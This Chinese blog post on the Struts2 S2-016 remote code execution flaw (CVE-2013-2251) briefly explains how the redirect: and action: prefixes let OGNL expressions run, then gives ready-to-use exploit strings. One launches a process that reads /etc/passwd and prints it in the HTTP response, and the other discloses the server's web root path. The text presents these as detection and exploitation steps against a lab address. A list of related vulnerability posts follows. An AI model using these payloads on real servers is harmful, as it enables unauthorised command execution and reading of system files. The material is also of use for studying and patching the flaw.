2. 程式人生 > >S2-016 遠端程式碼執行漏洞

S2-016 遠端程式碼執行漏洞

阿新 發佈:2018-12-21

在struts2中,DefaultActionMapper類支援以"action:"、“redirect:”、"redirectAction:"作為導航或是重定向字首,但是這些字首後面同時可以跟OGNL表示式,由於struts2沒有對這些字首做過濾,導致利用OGNL表示式呼叫java靜態方法執行任意系統命令。

漏洞記錄

S2-016
CVE-2013-2251
影響版本:Struts 2.0.0 – Struts 2.3.15
http://struts.apache.org/release/2.3.x/docs/s2-016.html
影響範圍非常大

漏洞檢測利用

驗證:


訪問http://192.168.1.15:8080/index.action?redirect:OGNL表示式即可執行OGNL表示式。

http://192.168.1.15:8080/index.action?action:%25{3*4}

執行任意命令EXP

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆網站路徑EXP

?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

k8工具檢測利用
在這裡插入圖片描述
執行命令:
在這裡插入圖片描述

參考連結:
https://www.freebuf.com/vuls/11220.html
https://github.com/vulhub/vulhub/blob/master/struts2/s2-016/README.zh-cn.md

在這裡插入圖片描述

相關推薦

S2-016遠端程式碼執行漏洞檢測與利用

概述 S2-016是13年7月爆出的,那時候的我還沒涉及Web安全研究。這次遲到的分析也算是對過去的補充。這個漏洞影響了Struts 2.3.15.1之前的所有版本。問題主要出在對於特殊URL處理中,redirect與redirectAction後面跟上Ognl表示式會被伺服器執行。 漏洞分

S2-016 遠端程式碼執行漏洞

在struts2中,DefaultActionMapper類支援以"action:"、“redirect:”、"redirectAction:"作為導航或是重定向字首,但是這些字首後面同時可以跟OGNL表示式,由於struts2沒有對這些字首做過濾,導致利用OGNL表示式呼叫ja

S2-032 遠端程式碼執行漏洞檢測與利用

什麼是STRUTS 2漏洞? Struts 是Apache軟體基金會(ASF)贊助的一個開源專案,通過採用JavaServlet/JSP技術,實現基於Java EEWeb應用的MVC設計模式的應用框架,Struts 2是Struts的下一代產品,是在 Struts 1和WebWork的技術基礎上

S2-029 遠端程式碼執行漏洞檢測與利用

概述 struts2 029漏洞已經爆出一段時間,網上有一些相關分析,首先,漏洞確定是出現在OGNL解釋執行的過程,具體漏洞測試poc網上已經有很多,我在2.2.1、2.3.24.1、2.3.25、2.5beta3、2.3.26上面測試都可以執行,不過修改的安全引數稍微不同。 2.2.1只需

S2-013 遠端程式碼執行漏洞檢測與利用

前言 S2-014是對於S2-013修復不完整的造成的漏洞,會在漏洞分析中提到,所以文字的主要分析的還是S2-013 而且在分析的時候,發現參考網上資料時對於漏洞觸發邏輯的一些錯誤 至少目前我自己是那麼認為的:) 漏洞環境根據vulhub修改而來,環境地址 https://gi

S2-037 遠端程式碼執行漏洞檢測與利用

struts2 s2-037遠端程式碼執行漏洞介紹 S2-037的漏洞利用思路建立在s2-033的基礎只上,還是對method沒有進行過濾導致的,漏洞影響Struts 2.3.20 – Struts 2.3.28.1版本,使用到REST外掛的Struts2應用,會被攻擊者實現遠端程式碼執行攻擊,

S2-052 遠端程式碼執行漏洞檢測與利用

除錯環境搭建 使用官方的rest-sample即可,下載2.5.12版本的原始碼https://github.com/apache/struts/archive/STRUTS_2_5_12.zip,然後將apps下面的rest-showcase原始碼脫下來。 Eclipse中新建一個mave

S2-045遠端程式碼執行漏洞

Apache Struts 2被曝存在遠端命令執行漏洞,漏洞編號S2-045,CVE編號CVE-2017-5638,在使用基於Jakarta外掛的檔案上傳功能時,有可能存在遠端命令執行,導致系統被黑客入侵。惡意使用者可在上傳檔案時通過修改HTTP請求頭中的Content-Type

S2-057遠端程式碼執行漏洞檢測與利用

Apache wiki更新了一個Struts2的遠端程式碼執行漏洞(S2-057),漏洞威脅等級為高危,漏洞對應的CVE編號為CVE-2018-11776。 定義XML配置時如果沒有設定namespace的值,並且上層動作配置中並沒有設定或使用萬用字元namespace時,可能會

S2-053 遠端程式碼執行漏洞檢測與利用

Struts2在使用Freemarker模板引擎的時候,同時允許解析OGNL表示式。導致使用者輸入的資料本身不會被OGNL解析,但由於被Freemarker解析一次後變成離開一個表示式,被OGNL解析第二次,導致任意命令執行漏洞。 漏洞記錄 漏洞編號:S2-053(

S2-052 遠端程式碼執行漏洞檢查利用

2017年9月5日,Apache Struts釋出最新安全公告,Apache Struts2的REST外掛存在遠端程式碼執行的高危漏洞,該漏洞由lgtm.com的安全研究員彙報,漏洞編號為CVE-2017-9805(S2-052)。Struts2 REST外掛的XStream元件

S2-048 遠端程式碼執行漏洞檢測利用

2017年7月7日,ApacheStruts 釋出最新的安全公告,Apache Struts2的strus1外掛存在遠端程式碼執行的高危漏洞,漏洞編號為 CVE-2017-9791(S2-048)。攻擊者可以構造惡意的欄位值通過Struts2的struts2-struts1-pl

S2-012 遠端程式碼執行漏洞

原理 如果在配置 Action 中 Result 時使用了重定向型別,並且還使用 ${param_name} 作為重定向變數,例如: <package name="S2-012" extends="struts-default"> <action nam

S2-005 遠端程式碼執行漏洞檢測與利用

s2-005漏洞的起源源於S2-003(受影響版本: 低於Struts 2.0.12),struts2會將http的每個引數名解析為OGNL語句執行(可理解為java程式碼)。OGNL表示式通過#來訪問struts的物件,struts框架通過過濾#字元防止安全問題,然而通過uni

S2-001 遠端程式碼執行漏洞

該漏洞因為使用者提交表單資料並且驗證失敗時,後端會將使用者之前提交的引數值使用 OGNL 表示式 %{value} 進行解析,然後重新填充到對應的表單資料中。例如註冊或登入頁面,提交失敗後端一般會預設返回之前提交的資料,由於後端使用 %{value} 對提交的資料執行了一次 OG

關於Apache Struts2存在S2-045遠端程式碼執行漏洞

一、漏洞簡介   Apache Struts是美國阿帕奇(Apache)軟體基金會負責維護的一個開源專案,是一套用於建立企業級Java Web應用的開源MVC框架,主要提供兩個版本框架產品:Struts 1和Struts 2。 Apache Struts 2.3.5 -

【重大漏洞預警】Struts2 遠端程式碼執行漏洞 S2-045 原理初步分析

北京時間3月6日晚,Apache基金會發布安全公告稱,某旗下知名開源專案Apache Struts2 存在高危安全漏洞,允許攻擊者遠端執行程式碼,甚至獲取伺服器許可權。目前已有漏洞利用流出。 1.漏

Apache Struts最新漏洞 遠端程式碼執行漏洞預警 2018年11月08日

2018年11月8日,SINE安全監控檢測中心,檢測到Apache Struts官方更新了一個Struts漏洞補丁,這個漏洞是Apache Struts目前最新的漏洞,影響範圍較廣,低於Apache Struts 2.3.35的版本都會受到此次Struts漏洞的***,目前apache官方更新的漏洞補丁,主要

Git中的遠端程式碼執行漏洞已被修復 多個工具受影響

  據外媒 BleepingComputer 報道,Git 專案組於前兩天公佈了一個在 Git 命令列客戶端、Git Desktop 和 Atom 中發現的任意程式碼執行漏洞,這是一個比較嚴重的安全漏洞,可能會使得惡意倉庫在易受攻擊的計算機上遠端執行命令。   這個漏洞已被分配 CVE-

墨者學院 - Tomcat 遠端程式碼執行漏洞利用(第1題)

重新整理fit網站 burp截包,repeater,更改不安全的HTTP方法為PUT(將get更改為options可檢視伺服器支援哪些) PUT /自定義檔名/ HTTP/1.1 eg:   PUT /9.jsp/ HTTP/1.1  &nb